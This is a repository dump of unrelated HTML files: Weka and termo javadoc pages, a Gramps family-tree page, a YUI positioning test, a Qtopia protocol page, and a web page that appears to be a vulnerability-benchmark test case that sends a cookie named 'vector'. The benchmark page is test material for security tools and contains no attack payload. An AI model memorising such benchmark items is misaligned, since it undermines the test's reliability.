<TD><CODE><B><A HREF="../../../weka/associations/tertius/SimpleLinkedList.html#inverseIterator()">inverseIterator</A></B>()</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> boolean</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/associations/tertius/SimpleLinkedList.html#isEmpty()">isEmpty</A></B>()</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../weka/associations/tertius/SimpleLinkedList.LinkedListIterator.html" title="class in weka.associations.tertius">SimpleLinkedList.LinkedListIterator</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/associations/tertius/SimpleLinkedList.html#iterator()">iterator</A></B>()</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/associations/tertius/SimpleLinkedList.html#merge(weka.associations.tertius.SimpleLinkedList, java.util.Comparator)">merge</A></B>(<A HREF="../../../weka/associations/tertius/SimpleLinkedList.html" title="class in weka.associations.tertius">SimpleLinkedList</A> list,
java.util.Comparator comp)</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.Object</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/associations/tertius/SimpleLinkedList.html#removeFirst()">removeFirst</A></B>()</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> int</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/associations/tertius/SimpleLinkedList.html#size()">size</A></B>()</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/associations/tertius/SimpleLinkedList.html#sort(java.util.Comparator)">sort</A></B>(java.util.Comparator comp)</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.String</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/associations/tertius/SimpleLinkedList.html#toString()">toString</A></B>()</CODE>
<BR>
</TD>
</TR>
</TABLE>
<A NAME="methods_inherited_from_class_java.lang.Object"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left"><B>Methods inherited from class java.lang.Object</B></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE>equals, getClass, hashCode, notify, notifyAll, wait, wait, wait</CODE></TD>
</TR>
</TABLE>
<P>
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<A NAME="constructor_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Constructor Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="SimpleLinkedList()"><!-- --></A><H3>
SimpleLinkedList</H3>
<PRE>
public <B>SimpleLinkedList</B>()</PRE>
<DL>
</DL>
<!-- ============ METHOD DETAIL ========== -->
<A NAME="method_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Method Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="removeFirst()"><!-- --></A><H3>
removeFirst</H3>
<PRE>
public java.lang.Object <B>removeFirst</B>()</PRE>
<DL>
<DD><DL>
</DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="getFirst()"><!-- --></A><H3>
getFirst</H3>
<PRE>
public java.lang.Object <B>getFirst</B>()</PRE>
<DL>
<DD><DL>
</DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="getLast()"><!-- --></A><H3>
getLast</H3>
<PRE>
public java.lang.Object <B>getLast</B>()</PRE>
<DL>
<DD><DL>
</DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="addFirst(java.lang.Object)"><!-- --></A><H3>
addFirst</H3>
<PRE>
public void <B>addFirst</B>(java.lang.Object o)</PRE>
<DL>
<DD><DL>
</DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="add(java.lang.Object)"><!-- --></A><H3>
add</H3>
<PRE>
public void <B>add</B>(java.lang.Object o)</PRE>
<DL>
<DD><DL>
</DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="addAll(weka.associations.tertius.SimpleLinkedList)"><!-- --></A><H3>
addAll</H3>
<PRE>
public void <B>addAll</B>(<A HREF="../../../weka/associations/tertius/SimpleLinkedList.html" title="class in weka.associations.tertius">SimpleLinkedList</A> list)</PRE>
<DL>
<DD><DL>
</DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="clear()"><!-- --></A><H3>
clear</H3>
<PRE>
public void <B>clear</B>()</PRE>
<DL>
<DD><DL>
</DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="isEmpty()"><!-- --></A><H3>
isEmpty</H3>
<PRE>
public boolean <B>isEmpty</B>()</PRE>
<DL>
<DD><DL>
</DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="iterator()"><!-- --></A><H3>
iterator</H3>
<PRE>
public <A HREF="../../../weka/associations/tertius/SimpleLinkedList.LinkedListIterator.html" title="class in weka.associations.tertius">SimpleLinkedList.LinkedListIterator</A> <B>iterator</B>()</PRE>
<DL>
<DD><DL>
</DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="inverseIterator()"><!-- --></A><H3>
inverseIterator</H3>
<PRE>
public <A HREF="../../../weka/associations/tertius/SimpleLinkedList.LinkedListInverseIterator.html" title="class in weka.associations.tertius">SimpleLinkedList.LinkedListInverseIterator</A> <B>inverseIterator</B>()</PRE>
<DL>
<DD><DL>
</DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="size()"><!-- --></A><H3>
size</H3>
<PRE>
public int <B>size</B>()</PRE>
<DL>
<DD><DL>
</DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="merge(weka.associations.tertius.SimpleLinkedList, java.util.Comparator)"><!-- --></A><H3>
merge</H3>
<PRE>
public void <B>merge</B>(<A HREF="../../../weka/associations/tertius/SimpleLinkedList.html" title="class in weka.associations.tertius">SimpleLinkedList</A> list,
java.util.Comparator comp)</PRE>
<DL>
<DD><DL>
</DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="sort(java.util.Comparator)"><!-- --></A><H3>
sort</H3>
<PRE>
public void <B>sort</B>(java.util.Comparator comp)</PRE>
<DL>
<DD><DL>
</DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="toString()"><!-- --></A><H3>
toString</H3>
<PRE>
public java.lang.String <B>toString</B>()</PRE>
<DL>
<DD><DL>
<DT><B>Overrides:</B><DD><CODE>toString</CODE> in class <CODE>java.lang.Object</CODE></DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="getRevision()"><!-- --></A><H3>
getRevision</H3>
<PRE>
public java.lang.String <B>getRevision</B>()</PRE>
<DL>
<DD>Returns the revision string.
<P>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../weka/core/RevisionHandler.html#getRevision()">getRevision</A></CODE> in interface <CODE><A HREF="../../../weka/core/RevisionHandler.html" title="interface in weka.core">RevisionHandler</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>the revision</DL>
</DD>
</DL>
<!-- ========= END OF CLASS DATA ========= -->
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="http://www.cs.waikato.ac.nz/ml/weka/" target="_blank"><FONT CLASS="NavBarFont1"><B>Weka's home</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../weka/associations/tertius/Rule.html" title="class in weka.associations.tertius"><B>PREV CLASS</B></A>
<A HREF="../../../weka/associations/tertius/SimpleLinkedList.LinkedListInverseIterator.html" title="class in weka.associations.tertius"><B>NEXT CLASS</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../index.html?weka/associations/tertius/SimpleLinkedList.html" target="_top"><B>FRAMES</B></A>
<A HREF="SimpleLinkedList.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: <A HREF="#nested_class_summary">NESTED</A> | FIELD | <A HREF="#constructor_summary">CONSTR</A> | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: FIELD | <A HREF="#constructor_detail">CONSTR</A> | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
</BODY>
</HTML>
|
gramps42/gramps/example_NAVWEB0/ppl/q/9/O8KKQCOUKXFQRRL59Q.html
|
belissent/testing-example-reports
|
<!DOCTYPE html>
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-US">
<title>My Family Tree - Michaud, Anna Eva</title>
<meta charset="UTF-8" />
<meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name ="apple-mobile-web-app-capable" content="yes" />
<meta name="generator" content="Gramps 4.2.2 http://gramps-project.org/" />
<meta name="author" content="" />
<link href="../../../images/favicon2.ico" rel="shortcut icon" type="image/x-icon" />
<link href="../../../css/narrative-screen.css" media="screen" rel="stylesheet" type="text/css" />
<link href="../../../css/narrative-print.css" media="print" rel="stylesheet" type="text/css" />
<link href="../../../css/ancestortree.css" media="screen" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="header">
<h1 id="SiteTitle">My Family Tree</h1>
</div>
<div class="wrapper" id="nav" role="navigation">
<div class="container">
<ul class="menu" id="dropmenu">
<li class = "CurrentSection"><a href="../../../individuals.html" title="Individuals">Individuals</a></li>
<li><a href="../../../index.html" title="Surnames">Surnames</a></li>
<li><a href="../../../places.html" title="Places">Places</a></li>
<li><a href="../../../sources.html" title="Sources">Sources</a></li>
<li><a href="../../../media.html" title="Media">Media</a></li>
<li><a href="../../../thumbnails.html" title="Thumbnails">Thumbnails</a></li>
</ul>
</div>
</div>
<div class="content" id="IndividualDetail">
<h3>Michaud, Anna Eva<sup><small> <a href="#sref1">1</a></small></sup></h3>
<div id="summaryarea">
<table class="infolist">
<tr>
<td class="ColumnAttribute">Birth Name</td>
<td class="ColumnValue">
Michaud, Anna Eva
</td>
</tr>
<tr>
<td class="ColumnAttribute">Gramps ID</td>
<td class="ColumnValue">I1324</td>
</tr>
<tr>
<td class="ColumnAttribute">Gender</td>
<td class="ColumnValue">female</td>
</tr>
</table>
</div>
<div class="subsection" id="events">
<h4>Events</h4>
<table class="infolist eventlist">
<thead>
<tr>
<th class="ColumnEvent">Event</th>
<th class="ColumnDate">Date</th>
<th class="ColumnPlace">Place</th>
<th class="ColumnDescription">Description</th>
<th class="ColumnNotes">Notes</th>
<th class="ColumnSources">Sources</th>
</tr>
</thead>
<tbody>
<tr>
<td class="ColumnEvent">
Birth
</td>
<td class="ColumnDate">1716</td>
<td class="ColumnPlace"> </td>
<td class="ColumnDescription">
Birth of Michaud, Anna Eva
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
</tbody>
</table>
</div>
<div class="subsection" id="families">
<h4>Families</h4>
<table class="infolist">
<tr class="BeginFamily">
<td class="ColumnType"> </td>
<td class="ColumnAttribute"> </td>
<td class="ColumnValue"><a href="" title="Family of Beaulieu, Johann Adam and Michaud, Anna Eva">Family of Beaulieu, Johann Adam and Michaud, Anna Eva<span class="grampsid"> [F0438]</span></a></td>
</tr>
<tr class="BeginFamily">
<td class="ColumnType">Married</td>
<td class="ColumnAttribute">Husband</td>
<td class="ColumnValue">
<a href="../../../ppl/o/d/38KKQCVBBMX1BL3RDO.html">Beaulieu, Johann Adam<span class="grampsid"> [I1323]</span></a>
</td>
</tr>
<tr>
<td class="ColumnType"> </td>
<td class="ColumnAttribute"> </td>
<td class="ColumnValue">
<table class="infolist eventlist">
<thead>
<tr>
<th class="ColumnEvent">Event</th>
<th class="ColumnDate">Date</th>
<th class="ColumnPlace">Place</th>
<th class="ColumnDescription">Description</th>
<th class="ColumnNotes">Notes</th>
<th class="ColumnSources">Sources</th>
</tr>
</thead>
<tbody>
<tr>
<td class="ColumnEvent">
Marriage
</td>
<td class="ColumnDate"> </td>
<td class="ColumnPlace"> </td>
<td class="ColumnDescription">
Marriage of Beaulieu, Johann Adam and Michaud, Anna Eva
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</table>
</div>
<div class="subsection" id="pedigree">
<h4>Pedigree</h4>
<ol class="pedigreegen">
<li>
<ol>
<li class="thisperson">
Michaud, Anna Eva
<ol class="spouselist">
<li class="spouse">
<a href="../../../ppl/o/d/38KKQCVBBMX1BL3RDO.html">Beaulieu, Johann Adam<span class="grampsid"> [I1323]</span></a>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</div>
<div class="subsection" id="sourcerefs">
<h4>Source References</h4>
<ol>
<li>
<a href="../../../src/x/a/X5TJQC9JXU4RKT6VAX.html" title="Import from test2.ged" name ="sref1">
Import from test2.ged
<span class="grampsid"> [S0003]</span>
</a>
</li>
</ol>
</div>
</div>
<div class="fullclear"></div>
<div id="footer">
<p id="createdate">
Generated by <a href="http://gramps-project.org/">Gramps</a> 4.2.2 on 2015-12-25<br />Last change was the 2007-07-26 08:34:25
</p>
<p id="copyright">
</p>
</div>
</body>
</html>
|
src/main/webapp/BenchmarkTest00949.html
|
ganncamp/Benchmark
|
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<script src="js/jquery.min.js"></script>
<script type="text/javascript" src="js/js.cookie.js"></script>
<title>BenchmarkTest00949</title>
</head>
<body>
<form action="/benchmark/BenchmarkTest00949" method="POST" id="FormBenchmarkTest00949" >
<div><p>Here is the image you are looking for:  </p></div>
<div><img src="img/500px-Banner_stand.png" style="width: 20%; height: 20%" class="img-responsive" alt="Responsive image" onload="setCookie('vector','test',1)"></div>
<div><p>This page automatically generated the cookie named vector with the value displayed below,
if you want to generate a new cookie with a different value or use a specific vector, please
use the text box "Value" then press the "Generate cookie" button; once you have the value you can
press the "Test it!" to send the cookie.</p></div>
<div><label>Parameter: cookie vector<BR> Value:</label>
<input type="text" id="vector" name="vector" value="FileName"></input></div>
<div><input type="button" value="Generate cookie" onclick="setCookie('vector','',1)" id="cGenerator"/></div>
<br/>
<div><h5 id="cValue"></h5></div>
<div><input type="submit" value="Test it!" /></div>
</form>
</div>
<script>
function setCookie(cname, cvalue, exdays) {
document.cookie = cname + '=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';
var d = new Date();
d.setTime(d.getTime() + (exdays*24*60*60*1000));
var expires = "expires="+d.toUTCString();
if(cvalue==''){
Cookies.set(cname, document.getElementById("vector").value, { version: 1 });
}else{
Cookies.set(cname, "FileName", { version: 1 });
}
document.getElementById("cValue").innerText = document.cookie;
}
</script>
</body>
</html>
|
sites/all/libraries/yui/tests/dom/tests/unit/dom-xy.html
|
artefactual-labs/trac
|
<!doctype html>
<html>
<head>
<title>YUI: GetXY</title>
<script type="text/javascript" src="../../../../build/yui/yui.js"></script>
<script type="text/javascript" src="./assets/dom-xy-test.js"></script>
<script type="text/javascript">
YUI({
coverage: ['dom-screen'],
filter: (window.location.search.match(/[?&]filter=([^&]+)/) || [])[1] || 'raw'
}).use('test-console', 'dom-xy-test', function (Y) {
Y.DOM._testXY();
new Y.Test.Console().render();
Y.Test.Runner.setName('Dom: XY');
Y.Test.Runner.run();
});
</script>
<style type="text/css" media="screen">
.yui3-console {
position: absolute;
right: 0;
top: 0;
}
html {
border: 10px solid #000;
Xmargin: 20px; /* manual test: false negative */
}
body {
/*background-image: url( grid.png );*/
background-position: -12.5px -12.5px;
Xborder: 30px solid blue; /* manual test: false negative */
height: 2000px;
margin: 50px;
padding: 10px;
}
.node {
height: 50px;
width: 50px;
border: 3px solid black;
background-color: #ccc;
opacity: .5;
filter: alpha(opacity=50);
}
span.node {
height:auto;
width:auto;
}
.nodeOver {
position: relative;
background-color: yellow;
opacity: .5;
filter: alpha(opacity=50);
}
.nodeOver-table {
background-color: red;
opacity: .1;
filter: alpha(opacity=10);
}
.nodeOver-td,
.nodeOver-th {
background-color: blue;
}
.nodeOver-tr {
background-color: green;
}
#abs1, #abs2, #abs3, #abs4 {
position: absolute;
top: 200px;
left: 200px;
}
#rel1, #rel2, #rel3, #rel4 {
position: relative;
top: 100px;
left: 100px;
}
span.rel {
position: relative;
top:150px;
left:150px;
}
span.abs {
position: absolute;
top:250px;
left:250px;
}
#play1, #play2, #play3, #play4 {
position: relative;
height: 400px;
width: 400px;
border: 3px solid black;
float: left;
margin: 10px;
}
#play2, #play3, #play4 {
overflow: auto;
}
#play2 .wrap, #play3 .wrap, #play4 .wrap {
height: 700px;
}
#play2 {
top: 200px;
left: 200px;
}
#play3, #play4 {
position: static;
}
#runner {
clear: both;
}
#fixed {
position: fixed;
top: 0px;
left: 800px;
}
#results {
border: 1px solid black;
background-color: #ccc;
width: 200px;
}
</style>
</head>
<body class="yui3-skin-sam">
<h1 id="h1-1">Positioning Tests</h1>
<div id="static1" class="node">S1</div>
<div id="abs1" class="node">A1</div>
<div id="rel1" class="node">R1</div>
<div id="play1">
<div id="static2" class="node">S2</div>
<div id="abs2" class="node">A2</div>
<div id="rel2" class="node">R2</div>
</div>
<div id="play2">
<div class="wrap">
<div id="static3" class="node">S3</div>
<div id="abs3" class="node">A3</div>
<div id="rel3" class="node">R3</div>
Lorem ipsum dolor sit amet, <span id="p2-is" class="node st">P2 Static Inline</span> consectetuer adipiscing elit. Morbi sed mauris in magna tincidunt sodales. Etiam dolor. Aenean non justo. Sed nec diam sed lacus pretium luctus. Vivamus felis tortor, cursus vitae, malesuada in, pharetra vel, arcu. Aliquam erat volutpat. Suspendisse potenti. Maecenas in ipsum ac nisl congue congue. Cras a nibh. Praesent non est.
Morbi non dolor. <span id="p2-ir" class="node rel">P2 Rel Inline</span> Donec ut est <span id="p2-ia" class="node abs">P2 Abs Inline</span> vitae quam hendrerit tincidunt. Cras non tellus at lectus luctus ultricies. Nullam bibendum leo quis purus. Curabitur cursus tempus elit. Donec fringilla pede in leo. Morbi dapibus vestibulum enim. Phasellus non mi vel nunc luctus lacinia. Phasellus quis urna. Pellentesque dolor risus, fermentum et, molestie tempus, cursus eget, nisl.
</div>
</div>
<div id="play3">
<div class="wrap">
<div id="static4" class="node">S4</div>
</div>
</div>
<div id="play4">
<div class="wrap">
<div id="static5" class="node">S5</div>
<div id="abs4" class="node">A4</div>
<div id="rel4" class="node">R4</div>
Lorem ipsum dolor sit amet, <span id="p4-is" class="node st">P4 Static Inline</span> consectetuer adipiscing elit. Morbi sed mauris in magna tincidunt sodales. Etiam dolor. Aenean non justo. Sed nec diam sed lacus pretium luctus. Vivamus felis tortor, cursus vitae, malesuada in, pharetra vel, arcu. Aliquam erat volutpat. Suspendisse potenti. Maecenas in ipsum ac nisl congue congue. Cras a nibh. Praesent non est.
Morbi non dolor. <span id="p4-ir" class="node rel">P4 Rel Inline</span> Donec ut est <span id="p4-ia" class="node abs">P4 Abs Inline</span> vitae quam hendrerit tincidunt. Cras non tellus at lectus luctus ultricies. Nullam bibendum leo quis purus. Curabitur cursus tempus elit. Donec fringilla pede in leo. Morbi dapibus vestibulum enim. Phasellus non mi vel nunc luctus lacinia. Phasellus quis urna. Pellentesque dolor risus, fermentum et, molestie tempus, cursus eget, nisl.
</div>
</div>
<div id="fixed" class="node">Fixed</div>
<table border="1" width="300" id="table1">
<caption>I am a table</caption>
<thead>
<tr id="tr1">
<th id="th1">1</th><th id="th2">2</th><th id="th3">3</th><th id="th4">4</th>
</tr>
</thead>
<tbody>
<tr id="tr2">
<td id="td2-1">1</td>
<td id="td2-2">2</td>
<td id="td2-3">3</td>
<td id="td2-4">4</td>
</tr>
<tr id="tr3">
<td id="td3-1">1</td>
<td id="td3-2">2</td>
<td id="td3-3">3</td>
<td id="td3-4">4</td>
</tr>
<tr id="tr4">
<td id="td4-1">1</td>
<td id="td4-2">2</td>
<td id="td4-3">3</td>
<td id="td4-4">4</td>
</tr>
</tbody>
</table>
</body>
</html>
|
doc/termo/activityModel/class-use/WilsonActivityModelTest.html
|
HugoRedon/Materia
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_11) on Thu Jul 31 14:36:29 CDT 2014 -->
<title>Uses of Class termo.activityModel.WilsonActivityModelTest</title>
<meta name="date" content="2014-07-31">
<link rel="stylesheet" type="text/css" href="../../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class termo.activityModel.WilsonActivityModelTest";
}
}
catch(err) {
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../termo/activityModel/WilsonActivityModelTest.html" title="class in termo.activityModel">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../index-files/index-1.html">Index</a></li>
<li><a href="../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../index.html?termo/activityModel/class-use/WilsonActivityModelTest.html" target="_top">Frames</a></li>
<li><a href="WilsonActivityModelTest.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class termo.activityModel.WilsonActivityModelTest" class="title">Uses of Class<br>termo.activityModel.WilsonActivityModelTest</h2>
</div>
<div class="classUseContainer">No usage of termo.activityModel.WilsonActivityModelTest</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../termo/activityModel/WilsonActivityModelTest.html" title="class in termo.activityModel">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../index-files/index-1.html">Index</a></li>
<li><a href="../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../index.html?termo/activityModel/class-use/WilsonActivityModelTest.html" target="_top">Frames</a></li>
<li><a href="WilsonActivityModelTest.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
src/qtopiadesktop/doc/html/qdsync-331-1.html
|
muromec/qtopia-ezx
|
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!-- /home/test1/tmp/qtopia/qtopia-opensource-4.3.4/src/qtopiadesktop/doc/src/qdsyncprotocol.qdocpp -->
<head>
<title>331</title>
<link href="classic.css" rel="stylesheet" type="text/css" />
</head>
<body>
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" valign="top" width="32"><img src="images/qpelogo.png" align="left" width="32" height="32" border="0" /></td>
<td width="1"> </td><td class="postheader" valign="center"><a href="../index.html"><font color="#004faf">Qtopia Home</font></a> · <a href="index.html"><font color="#004faf">Index</font></a> · <a href="classes.html"><font color="#004faf">Classes</font></a> · <a href="headers.html"><font color="#004faf">Headers</font></a> · <a href="overviews.html"><font color="#004faf">Overviews</font></a> </td>
<td align="right" valign="top"><img src="images/codeless.png" align="right" border="0" /></td></tr></table><h1 class="title">331<br /><span class="subtitle"></span>
</h1>
<a name="usage"></a>
<h3>Usage</h3>
<p>This command includes an untranslated status message that can be ignored.</p>
<pre> 331 User name ok, need password</pre>
<a name="description"></a>
<h3>Description</h3>
<p>Sent from the device to the desktop in response to a <a href="qdsync-user-1.html">USER</a> command.</p>
<p>After this command is sent the device will expect to receive a <a href="qdsync-pass-1.html">PASS</a> command.</p>
<p>See also <a href="qdsync-commands.html">qdsync Protocol</a>.</p>
<p /><address><hr /><div align="center">
<table width="100%" cellspacing="0" border="0"><tr class="address">
